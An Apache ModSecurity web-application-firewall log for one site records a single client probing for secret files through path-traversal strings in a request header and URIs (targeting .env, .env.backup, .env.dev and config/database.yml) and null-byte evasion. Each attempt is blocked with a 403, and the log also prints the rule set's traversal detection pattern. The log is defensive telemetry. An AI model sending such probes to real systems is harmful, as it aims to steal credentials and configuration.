[tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1TgAAARE"]
[Tue May 12 06:16:31.962665 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1TgAAARE"]
[Tue May 12 06:16:31.962696 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1TgAAARE"]
[Tue May 12 06:16:31.963054 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1TgAAARE"]
[Tue May 12 06:16:32.137108 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnxfeipD4uoG21Fo_3QAAAAU"]
[Tue May 12 06:16:32.348187 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpoBfeipD4uoG21Fo_4AAAAAU"]
[Tue May 12 06:16:32.348424 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpoBfeipD4uoG21Fo_4AAAAAU"]
[Tue May 12 06:16:32.841138 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnxfeipD4uoG21Fo_3wAAAAI"]
[Tue May 12 06:16:32.863741 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnxs7kySIUZ3ORnI1TgAAARE"]
[Tue May 12 06:16:32.865808 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKpoBfeipD4uoG21Fo_4gAAAAI"]
[Tue May 12 06:16:32.866023 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKpoBfeipD4uoG21Fo_4gAAAAI"]
[Tue May 12 06:16:32.892759 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoBs7kySIUZ3ORnI1TwAAARE"]
[Tue May 12 06:16:32.892808 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoBs7kySIUZ3ORnI1TwAAARE"]
[Tue May 12 06:16:32.892845 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoBs7kySIUZ3ORnI1TwAAARE"]
[Tue May 12 06:16:32.893069 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoBs7kySIUZ3ORnI1TwAAARE"]
[Tue May 12 06:16:32.893123 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoBs7kySIUZ3ORnI1TwAAARE"]
[Tue May 12 06:16:32.893155 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoBs7kySIUZ3ORnI1TwAAARE"]
[Tue May 12 06:16:32.893553 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoBs7kySIUZ3ORnI1TwAAARE"]
[Tue May 12 06:16:33.027760 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpoBfeipD4uoG21Fo_4AAAAAU"]
[Tue May 12 06:16:33.053976 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpoRfeipD4uoG21Fo_4wAAAAU"]
[Tue May 12 06:16:33.054057 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpoRfeipD4uoG21Fo_4wAAAAU"]
[Tue May 12 06:16:33.054218 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpoRfeipD4uoG21Fo_4wAAAAU"]
[Tue May 12 06:16:33.633455 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpoBfeipD4uoG21Fo_4gAAAAI"]
[Tue May 12 06:16:33.639417 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpoBs7kySIUZ3ORnI1TwAAARE"]
[Tue May 12 06:16:33.659431 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.dev"] [unique_id "agKpoRfeipD4uoG21Fo_5AAAAAI"]
[Tue May 12 06:16:33.659640 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.dev"] [unique_id "agKpoRfeipD4uoG21Fo_5AAAAAI"]
[Tue May 12 06:16:33.668742 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoRs7kySIUZ3ORnI1UQAAARE"]
[Tue May 12 06:16:33.668787 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoRs7kySIUZ3ORnI1UQAAARE"]
[Tue May 12 06:16:33.668816 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoRs7kySIUZ3ORnI1UQAAARE"]
[Tue May 12 06:16:33.669042 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoRs7kySIUZ3ORnI1UQAAARE"]
[Tue May 12 06:16:33.669088 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoRs7kySIUZ3ORnI1UQAAARE"]
[Tue May 12 06:16:33.669490 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpoRs7kySIUZ3ORnI1UQAAARE"]
[Tue May 12 06:16:33.813310 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpoRfeipD4uoG21Fo_4wAAAAU"]
[Tue May 12 06:16:33.837191 2026] [core:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] AH10244: invalid URI path (/css../../../.env)
[Tue May 12 06:16:34.137175 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpoRs7kySIUZ3ORnI1UQAAARE"]
[Tue May 12 06:16:34.154898 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpoRfeipD4uoG21Fo_5AAAAAI"]
[Tue May 12 06:16:34.166038 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpohs7kySIUZ3ORnI1UwAAARE"]
[Tue May 12 06:16:34.166081 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpohs7kySIUZ3ORnI1UwAAARE"]
[Tue May 12 06:16:34.166113 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpohs7kySIUZ3ORnI1UwAAARE"]
